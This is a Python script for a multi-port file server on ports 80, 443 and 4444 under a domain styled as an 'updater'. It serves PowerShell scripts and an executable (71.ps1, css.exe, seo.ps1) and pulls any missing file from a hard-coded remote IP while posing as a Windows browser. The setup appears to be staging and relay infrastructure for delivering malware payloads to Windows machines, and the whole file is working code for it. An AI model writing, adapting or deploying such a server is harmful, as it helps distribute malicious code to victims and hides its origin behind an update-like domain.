# /root/file_server_multi.py

import http.server
import ssl
import logging
import os
import urllib.request
import urllib.error
import socket
import threading
import time
from urllib.parse import urlparse
from datetime import datetime

# ==================== LOGGING ====================
logger = logging.getLogger('FileServer')
logger.setLevel(logging.DEBUG)

formatter = logging.Formatter('%(asctime)s - [%(levelname)s] - %(message)s', 
                             datefmt='%Y-%m-%d %H:%M:%S')

# Logs to file
file_handler = logging.FileHandler('./file_server.log')
file_handler.setLevel(logging.INFO)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)

# Logs to console
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.DEBUG)
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)

# ==================== CONFIG ====================
PORTS = {
    80: {'name': 'HTTP', 'ssl': False},
    443: {'name': 'HTTPS', 'ssl': True},
    4444: {'name': 'HTTPS-ALT', 'ssl': True}
}

FILES_DIR = '/home/roosoot/files'
# UPDATED: New remote host
REMOTE_SERVER = 'http://20.2.85.176'
# UPDATED: New domain for SSL
DOMAIN = 'updater.eastasia.cloudapp.azure.com'

TIMEOUT = 120  # 2 minutes
MAX_RETRIES = 2
CHUNK_SIZE = 8192  # 8KB chunks

# ==================== SERVER CLASS ====================
class FileServerHandler(http.server.BaseHTTPRequestHandler):
    
    def do_GET(self):
        """Process GET request"""
        client_ip = self.client_address[0]
        path = urlparse(self.path).path
        user_agent = self.headers.get('User-Agent', 'Unknown')[:100]
        host = self.headers.get('Host', 'unknown')
        
        logger.info(f"[REQUEST] IP: {client_ip} | Host: {host} | Path: {path}")
        
        # Main page
        if path == '/' or path == '' or path.endswith('/'):
            self.send_response(200)
            self.send_header('Content-Type', 'text/html; charset=utf-8')
            self.end_headers()
            
            try:
                port = self.server.server_address[1]
                protocol = 'HTTPS' if port in [443, 4444] else 'HTTP'
                
                html = f"""
                <html>
                <head><title>File Server - {DOMAIN}</title></head>
                <body style="font-family: Arial; padding: 20px;">
                    <h1>File Server Online</h1>
                    <p><b>Domain:</b> {DOMAIN}</p>
                    <p><b>Protocol:</b> {protocol}</p>
                    <p><b>Port:</b> {port}</p>
                    <p><b>Time:</b> {datetime.now().isoformat()}</p>
                    <hr>
                    <h2>Available Files:</h2>
                    <ul>
                        <li><a href="/71.ps1">/71.ps1</a></li>
                        <li><a href="/css.exe">/css.exe</a></li>
                        <li><a href="/seo.ps1">/seo.ps1</a></li>
                    </ul>
                </body>
                </html>
                """.encode()
                
                self.wfile.write(html)
                logger.info(f"[RESPONSE] IP: {client_ip} | Status: 200 OK")
            except Exception as e:
                logger.error(f"[ERROR] Main page: {str(e)}")
            
            return
        
        # Get filename
        filename = path.lstrip('/')
        
        # Protect from directory traversal
        if '..' in filename or filename.startswith('/'):
            logger.warning(f"[BLOCKED] IP: {client_ip} | Path: {path} | Reason: Security check")
            try:
                self.send_response(403)
                self.end_headers()
            except:
                pass
            return
        
        filepath = os.path.join(FILES_DIR, filename)
        filepath = os.path.abspath(filepath)
        files_dir_abs = os.path.abspath(FILES_DIR)
        
        if not filepath.startswith(files_dir_abs):
            logger.warning(f"[BLOCKED] IP: {client_ip} | Path: {path} | Reason: Directory traversal")
            try:
                self.send_response(403)
                self.end_headers()
            except:
                pass
            return
        
        # Check if directory
        if os.path.isdir(filepath):
            logger.warning(f"[BLOCKED] IP: {client_ip} | Path: {path} | Reason: Directory listing")
            try:
                self.send_response(403)
                self.end_headers()
            except:
                pass
            return
        
        # Check locally
        if not os.path.exists(filepath):
            logger.warning(f"[MISSING] File not found locally: {filename}")
            logger.info(f"[FETCH] Downloading from: {REMOTE_SERVER}/{filename}")
            
            if not self.download_from_remote(filename, filepath):
                logger.error(f"[FAILED] Could not download: {filename}")
                try:
                    self.send_response(404)
                    self.send_header('Content-Type', 'text/plain')
                    self.end_headers()
                    self.wfile.write(b"File not found on remote server")
                except Exception as e:
                    logger.warning(f"[BROKEN_PIPE] Could not send 404: {str(e)}")
                return
            
            logger.info(f"[SUCCESS] File downloaded: {filename}")
        
        # Send file to client
        try:
            file_size = os.path.getsize(filepath)
            port = self.server.server_address[1]
            
            logger.info(f"[DOWNLOAD] IP: {client_ip} | Port: {port} | File: {filename} | Size: {file_size} bytes")
            
            self.send_response(200)
            self.send_header('Content-Type', 'application/octet-stream')
            self.send_header('Content-Disposition', f'attachment; filename="{filename}"')
            self.send_header('Content-Length', str(file_size))
            self.send_header('Cache-Control', 'public, max-age=86400')
            self.send_header('Access-Control-Allow-Origin', '*')
            self.end_headers()
            
            # Send in chunks (efficient for large files)
            with open(filepath, 'rb') as f:
                while True:
                    chunk = f.read(CHUNK_SIZE)
                    if not chunk:
                        break
                    self.wfile.write(chunk)
            
            logger.info(f"[SENT] File sent successfully: {filename}")
            
        except BrokenPipeError:
            logger.warning(f"[BROKEN_PIPE] IP: {client_ip} | File: {filename} | Client disconnected")
        
        except Exception as e:
            logger.error(f"[ERROR] IP: {client_ip} | File: {filename} | {type(e).__name__}: {str(e)}")
            try:
                self.send_response(500)
                self.end_headers()
            except:
                pass
    
    def download_from_remote(self, filename, filepath):
        """Download file from remote server with retries"""
        
        for attempt in range(1, MAX_RETRIES + 1):
            remote_url = f"{REMOTE_SERVER}/{filename}"
            
            try:
                logger.info(f"[DOWNLOAD_ATTEMPT] {attempt}/{MAX_RETRIES} | URL: {remote_url}")
                
                request = urllib.request.Request(remote_url)
                request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 10.0)')
                
                # Download file with timeout
                with urllib.request.urlopen(request, timeout=TIMEOUT) as response:
                    
                    # Create directory if needed
                    os.makedirs(os.path.dirname(filepath), exist_ok=True)
                    
                    # Download in chunks
                    downloaded = 0
                    with open(filepath, 'wb') as f:
                        while True:
                            chunk = response.read(CHUNK_SIZE)
                            if not chunk:
                                break
                            f.write(chunk)
                            downloaded += len(chunk)
                    
                    logger.info(f"[SAVED] File saved: {filepath} ({downloaded} bytes)")
                    return True
            
            except urllib.error.HTTPError as e:
                logger.warning(f"[HTTP_ERROR] Attempt {attempt}/{MAX_RETRIES} | Code: {e.code}")
                if attempt < MAX_RETRIES:
                    logger.info(f"[RETRY] Retrying in 3 seconds...")
                    time.sleep(3)
            
            except socket.timeout:
                logger.warning(f"[SOCKET_TIMEOUT] Attempt {attempt}/{MAX_RETRIES}")
                if attempt < MAX_RETRIES:
                    logger.info(f"[RETRY] Retrying in 3 seconds...")
                    time.sleep(3)
            
            except Exception as e:
                logger.warning(f"[ERROR] Attempt {attempt}/{MAX_RETRIES} | {type(e).__name__}: {str(e)}")
                if attempt < MAX_RETRIES:
                    logger.info(f"[RETRY] Retrying in 3 seconds...")
                    time.sleep(3)
        
        logger.error(f"[DOWNLOAD_FAILED] All {MAX_RETRIES} attempts failed for {filename}")
        return False
    
    def log_message(self, format, *args):
        """Disable standard HTTP server logs"""
        pass

# ==================== RUN SERVERS ====================
def run_server(port, use_ssl=False):
    """Start server on specific port"""
    
    try:
        httpd = http.server.HTTPServer(('0.0.0.0', port), FileServerHandler)
        httpd.timeout = 300  # 5 minutes connection timeout
        
        # Apply SSL if needed
        if use_ssl:
            try:
                context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
                # UPDATED: Use the correct domain path for certificates
                context.load_cert_chain(
                    f'/etc/letsencrypt/live/{DOMAIN}/fullchain.pem',
                    f'/etc/letsencrypt/live/{DOMAIN}/privkey.pem'
                )
                httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
                logger.info(f"[SSL] Certificates loaded for port {port}")
            except Exception as e:
                logger.error(f"[SSL_ERROR] Port {port}: {str(e)}")
                return False
        
        protocol = 'HTTPS' if use_ssl else 'HTTP'
        logger.info(f"[SERVER] {protocol} Server listening on port {port}")
        
        httpd.serve_forever()
        
    except OSError as e:
        logger.error(f"[PORT_ERROR] Could not bind to port {port}: {str(e)}")
        return False
    except KeyboardInterrupt:
        logger.info(f"[STOP] Port {port} server stopped")
        return True
    except Exception as e:
        logger.error(f"[FATAL] Port {port}: {type(e).__name__}: {str(e)}")
        return False

# ==================== INITIALIZATION ====================
def init():
    """Initialize server"""
    
    if not os.path.exists(FILES_DIR):
        os.makedirs(FILES_DIR, mode=0o755)
        logger.info(f"[INIT] Created directory: {FILES_DIR}")
    
    os.chmod(FILES_DIR, 0o755)
    
    logger.info(f"[INIT] ========== FILE SERVER MULTI-PORT ==========")
    logger.info(f"[INIT] Domain: {DOMAIN}")
    logger.info(f"[INIT] Files directory: {os.path.abspath(FILES_DIR)}")
    logger.info(f"[INIT] Remote server: {REMOTE_SERVER}")
    logger.info(f"[INIT] Timeout: {TIMEOUT} seconds")
    logger.info(f"[INIT] Chunk size: {CHUNK_SIZE} bytes")
    logger.info(f"[INIT] Ports:")
    for port, info in PORTS.items():
        logger.info(f"[INIT]   - {port}: {info['name']} {'(SSL)' if info['ssl'] else '(No SSL)'}")
    logger.info(f"[INIT] ==============================================")

# ==================== MAIN FUNCTION ====================
def main():
    """Start all servers"""
    init()
    
    threads = []
    
    for port, config in PORTS.items():
        logger.info(f"[START] Starting {config['name']} on port {port}...")
        
        thread = threading.Thread(
            target=run_server,
            args=(port, config['ssl']),
            daemon=False,
            name=f"Server-{port}"
        )
        thread.start()
        threads.append(thread)
    
    logger.info(f"[START] All servers started!")
    logger.info(f"[START] Access URLs:")
    logger.info(f"[START]   - http://{DOMAIN}/file.ps1")
    logger.info(f"[START]   - https://{DOMAIN}:443/file.ps1")
    logger.info(f"[START]   - https://{DOMAIN}:4444/file.ps1")
    
    try:
        for thread in threads:
            thread.join()
    except KeyboardInterrupt:
        logger.info("[STOP] Shutting down all servers...")
    except Exception as e:
        logger.error(f"[ERROR] {type(e).__name__}: {str(e)}")

if __name__ == '__main__':
    try:
        main()
    except Exception as e:
        logger.error(f"[FATAL] {type(e).__name__}: {str(e)}")
        exit(1)

